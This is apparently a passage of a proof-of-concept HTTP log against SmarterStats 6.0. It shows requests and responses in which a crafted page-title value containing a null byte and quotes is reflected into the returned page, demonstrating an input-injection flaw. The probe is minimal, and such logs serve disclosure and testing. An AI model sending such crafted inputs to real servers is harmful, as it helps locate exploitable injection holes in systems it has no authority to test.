Y3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 1 (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6130
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Error" dir="ltr">
<form name="aspnetForm" method="post" action="frmError.aspx?aspxerrorpath=%2fDefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAUSJiN4MkY7RGVmYXVsdC5hc3B4ZGQCBw8PFgIfAwXSATxwPlRoZSBwYWdlIG9yIHJlc291cmNlIHRoYXQgeW91IGFyZSBhY2Nlc3NpbmcgaXMgdW5hdmFpbGFibGUgb3IgYW4gZXJyb3IgaGFzIG9jY3VycmVkLjwvcD4NCg0KPHA+VGhpcyBlcnJvciBvY2N1cnJlZCBhdCAxMC8xMi8yMDEwIDEyOjE3OjI2IEFNIGFuZCBoYXMgYmVlbiBsb2dnZWQuIFBsZWFzZSBjb250YWN0IHlvdXIgc3lzdGVtIGFkbWluaXN0cmF0b3IuPC9wPmRkZLSJ/XhweHnyPIJfVjF1wqLG0+lAk7tGsQ1E3+6Hn1C+" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;Default.aspx</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/12/2010 12:17:26 AM and has been logged. Please contact your system administrator.</p></span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='1' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

</form>
</body>
</html>

Request 2

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00''&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24491
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   .&#x27;&#x27;
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type='text/javascript'>
       if (parent.UpdateSection != null)
           parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Root " dir="ltr">
   
<table id="loadingMessage" class="LoadingMessageTable">
   <tr>
       <td class="LoadingMessageCell">
           <div class="LoadingShadowBox">
               <div class="LoadingMessage">
                   <div class="PageTitle">
                       <div class="RoundedPageTitleLeft">
                           <div class="RoundedPageTitleRight">
                               <img id="ctl00_ctl00_Image1" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
                               <div class="PageTitleText">
                                   Processing</div>
                           </div>
                       </div>
                   </div>
               </div>
               <div class="RoundedBottom">
                   <div class="RoundedLeft">
                       <div class="RoundedRight">
                           <div class="RoundedBottomLeft">
                               <div class="RoundedBottomRight">
                                   <div class="LoadingMessageInner">
                                       <div class="LoadingMessageText">
                                           SmarterStats is loading...</div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       </td>
   </tr>
</table>
<div class="LoadingGlyph" id="TopBarLoading" style="display: none">
   <img id="ctl00_ctl00_Image2" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
</div>

   <form name="aspnetForm" method="post" action="Default.aspx?section=UserDataMining" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
function ShowHelpRadWindow(){ SpawnHyperWindow('/UserControls/Popups/frmHelp.aspx?url=' + escape(HelpID) + '&extraInfo=' + escape(ExtraHelpID) + '', 330, 200, null); }//]]>
</script>

<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="Services/svcRealTimeService.asmx/js" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$Split$LP$StyledUpdatePanel1',''], ['ctl00$Split$LP$lnkUpdate',''], [], 90, 'ctl00');
//]]>
</script>


       <script type="text/javascript">
           self.GetUpdatesFunc = SSWeb.Services.svcRealTimeService.GetUpdates;
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/root"></script>
       <div class="PageHeader" id="PageHeader">
           <div class="PageHeaderText">
               <div class="PageHeaderActions">
                   
                   <span id="ctl00_HA"><span class="HeaderUserName">weirdo</span> | <span class="HeaderUserName">vilnerable.smarterstats.6.0.host</span> | <span class="HeaderLogOut"><a href="/Logout.aspx" target="_self" >Logout</a></span> | <span class="HeaderHelp"><a href="javascript:ShowHelpRadWindow()">Help</a></span></span>
               </div>
               <div class="PageHeaderVersion" id="PageHeaderVersion">
                   SmarterStats Free 6.0
               </div>
           </div>
       </div>
       
<!-- HyperSplitter -->
<div class='hsOuter ' id='ctl00_Split' style='visibility:hidden'>
<table class='hsContainer' id='ctl00_Split_Container'>
   <tr>
       <td class='hsHorizontal Sidebar' id='ctl00_Split_SB' style='width:46px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SB_Content'>
               
               <div class="SidebarWrapper"><div id="SidebarScrollUp" class="SidebarScrollUp"><a></a></div><div id="SidebarScroller" class="SidebarScroller">

<div id="SidebarIcon_UserWorkspace" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserWorkspace" href="/Default.aspx?section=UserWorkspace" onclick="UpdateSection('UserWorkspace', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Workspace</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserActivity" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserActivity" href="/Default.aspx?section=UserActivity" onclick="UpdateSection('UserActivity', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_SiteActivity', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Site Activity</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDemographics" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDemographics" href="/Default.aspx?section=UserDemographics" onclick="UpdateSection('UserDemographics', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Demographics', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Demographics</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserServerHealth" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserServerHealth" href="/Default.aspx?section=UserServerHealth" onclick="UpdateSection('UserServerHealth', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_ServerHealth', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Server Health</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSpiders" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSpiders" href="/Default.aspx?section=UserSpiders" onclick="UpdateSection('UserSpiders', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Spiders', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Spiders and Bots</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSeo" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSeo" href="/Default.aspx?section=UserSeo" onclick="UpdateSection('UserSeo', '/Client/frmSeoCollections.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>SEO</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDataMining" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDataMining" href="/Default.aspx?section=UserDataMining" onclick="UpdateSection('UserDataMining', '/Client/frmDataMineStart.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Data Mining</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSettings" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSettings" href="/Default.aspx?section=UserSettings" onclick="UpdateSection('UserSettings', '/Client/frmUser.aspx?action=mysettings', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Settings</div></div></div>
   </a>
</div>
</div><div id="SidebarScrollDown" class="SidebarScrollDown"><a></a></div></div>

           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_LP' style='width:250px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_LP_Content'>
               
               <div id="ctl00_Split_LP_StyledUpdatePanel1">
                   
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Settings
           </div>
       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
                   <div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuSN' name='ctl00$Split$LP$ctl01$menuSN' style='z-index:800'>
                   </ul>
                   </div>
                   <div class='hmClear'><!-- --></div>
                   
</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
                   <div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeNav'>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0' TTUID="NAVMySettings" TTUID="treeMySettings" >
                           <div class='htvLineFirst'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>My Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv0' TTUID="NAVMySettingsAccountSettings" TTUID="treeMySettingsAccountSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Account Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv1' TTUID="NAVMySettingsFilterSets" TTUID="treeMySettingsFilterSets" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/autoresponder.gif' /><a class='htvA' href='#'>Filter Sets</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                       <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettings" TTUID="treeSiteSettings" >
                           <div class='htvLineLast'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Site Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv0' Requires="SITEADMIN" TTUID="NAVSiteSettingsGeneralSettings" TTUID="treeSiteSettingsGeneralSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domainsettings.gif' /><a class='htvA' href='#'>General Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettingsUsers" TTUID="treeSiteSettingsUsers" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Users</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv2' Requires="ENTERPRISE&#x2c;&#x20;SITEADMIN" TTUID="NAVSiteSettingsEmailSettings" TTUID="treeSiteSettingsEmailSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/PopRetrieval.gif' /><a class='htvA' href='#'>Email Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv3' Requires="SITEADMIN" TTUID="NAVSiteSettingsPageAliases" TTUID="treeSiteSettingsPageAliases" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/aliases.gif' /><a class='htvA' href='#'>Page Aliases</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv5' Requires="SITEADMIN&#x2c;SEOENABLED" TTUID="NAVSiteSettingsSEOSettings" TTUID="treeSiteSettingsSEOSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/protocolsettings.gif' /><a class='htvA' href='#'>SEO Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv6' Requires="SITEADMIN" TTUID="NAVSiteSettingsLogStatus" TTUID="treeSiteSettingsLogStatus" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/allmessages.gif' /><a class='htvA' href='#'>Log Status</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                   </ul></div>
                   
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
</div>


   <script type="text/javascript">
       if (self.ResizeLeftBar) ResizeLeftBar();
   </script>



               </div>
               
               <a id="ctl00_Split_LP_lnkUpdate" href="javascript:__doPostBack(&#39;ctl00$Split$LP$lnkUpdate&#39;,&#39;&#39;)"></a>
               <input type="hidden" name="ctl00$Split$LP$SessionKey" id="ctl00_Split_LP_SessionKey" value="275a2fda26bf41d0a434458863c81036" />
           </div>
       </td>
       <td class='hsHorizontal Splitter' id='ctl00_Split_SplitBar' style='width:2px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SplitBar_Content'>
               
           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_Frame' style=''>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_Frame_Content'>
               
               <iframe id="ctl00_Split_Frame_ContentFrame" frameborder="0" scrolling="no" src="/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" style="width: 100%; border: none"></iframe>
               

           </div>
       </td>
   </tr>
</table>
</div>

       <div class="PageFooter" id="PageFooter">
       </div>
       <input type="hidden" name="ctl00$PageTitle" id="ctl00_PageTitle" value=".&#39;&#39;" />
       <input type="hidden" name="ctl00$PanelLoadedState" id="ctl00_PanelLoadedState" value="{}" />

       <script type="text/javascript">
           self.LBHidden = false;
           var panelLoadedStateObj = $get('ctl00_PanelLoadedState');
           var processingText = "Processing";
           var loadingText = "SmarterStats is loading...";
           var currentSection = 'UserSettings';
           var sidebarHeight = 0;
           var firstResize = true;
           var pageTitleId = 'ctl00_PageTitle';
           var $sup = $('#ctl00_Split_LP_StyledUpdatePanel1');
           var $scrollers = $('#SidebarScrollUp, #SidebarScrollDown');
           var $splitter = $('#ctl00_Split');
           var $sbs = $('#SidebarScroller');
           var $sbw = $sbs.parent();
           var $sbwp = $sbw.parent();
           var _extContentElement = $get('ctl00_Split_Frame_ContentFrame');
           function GetSMPane() { return self; }
           function Update(name) {
               $get(pageTitleId).value = document.title;
               SetCookieValue("TopBarSection", name);
               __doPostBack('ctl00$Split$LP$lnkUpdate',name + "|" + currentPage);
               currentSection = name;
               UpdateHash();
           }
           NavigateToHash();
           function HideLeftBar(val) {
               if (val === undefined) return;
               if (self.LBHidden == val) return;
               self.LBHidden = val;
               if (val) $('#ctl00_Split_LP, #ctl00_Split_SplitBar').HideHyperPane();
               else $('#ctl00_Split_LP, #ctl00_Split_SplitBar').ShowHyperPane();
               UpdateHash();
           }
           function SplitterResized() {
               ResizeLeftBar(true);
               ResizeIframes();
           }
           function ResizeLeftBar(setWidth) {
               if (firstResize) {
                   firstResize = false;
                   $scrollers.hide();
                   sidebarHeight = $sbs.outerHeight();
                   $sbw.height(sidebarHeight);
                   InitSidebarSliders();
               }

               $sup.ResizeToFit();
               var $ls = $('#LeftScrollable');
               $ls.parent().css('overflow','hidden');
               $ls.ResizeToFit();
               $ls.parent().css('overflow','visible');

               if (setWidth) {
                   var width = $sup.GetResizedWidth();
                   $sup.width(width);
                   $ls.width(width);
               }
               if (self.AdditionalResizeLeftBar) self.AdditionalResizeLeftBar();

               if ($sbwp.innerHeight() < sidebarHeight) {
                   $scrollers.show();
                   $sbw.ResizeToFit();
                   $sbs.ResizeToFit();
               }
               else if ($scrollers.is(':visible')) {
                   $scrollers.hide();
                   $sbw.height(sidebarHeight);
                   $sbs.height(sidebarHeight);
                   $sbs.scrollTop(0);
               }
           }
           function InitSidebarSliders() {
               var animationTime = self.EnableAnimations ? 150 : 0;
               $('.SidebarSlider').each(function() {
                   var control = $(this);
                   var wrapper = control.parent();
                   var parent = control.parent().parent();
                   var off = parent.offset();
                   control.children('div').css('float','none');
                   var width = control.innerWidth(true);
                   control.children('div').css('float','right');
                   control.add(wrapper).css({ top: off.top - 1, left: off.left + parent.outerWidth(true), width: 0, visibility: 'visible'}).hide();
                   var timer;
                   parent.hover(function() {
                       clearTimeout(timer);
                       parent.addClass('SidebarAnchorHover');
                       var off = parent.offset();
                       control.add(wrapper).css({ top: off.top - 1});
                       control.add(wrapper).stop().show().animate({ width: width}, animationTime, function () { wrapper.width(width+1); });
                   }, function() {
                       clearTimeout(timer);
                       timer = setTimeout(function () { control.add(wrapper).stop().animate({ width: 0}, animationTime, function () { control.add(wrapper).hide(); parent.removeClass('SidebarAnchorHover'); }); } , 66);
                   });
               });
           }
           function DoResize() {
               $splitter.ResizeHyperSplitter();
               ResizeLeftBar();
               ResizeIframes();
           }
           $(window).resize(function() { clearTimeout(self.resizeDelay); self.resizeDelay = setTimeout(DoResize, 100); });
           $(window).load(function() {
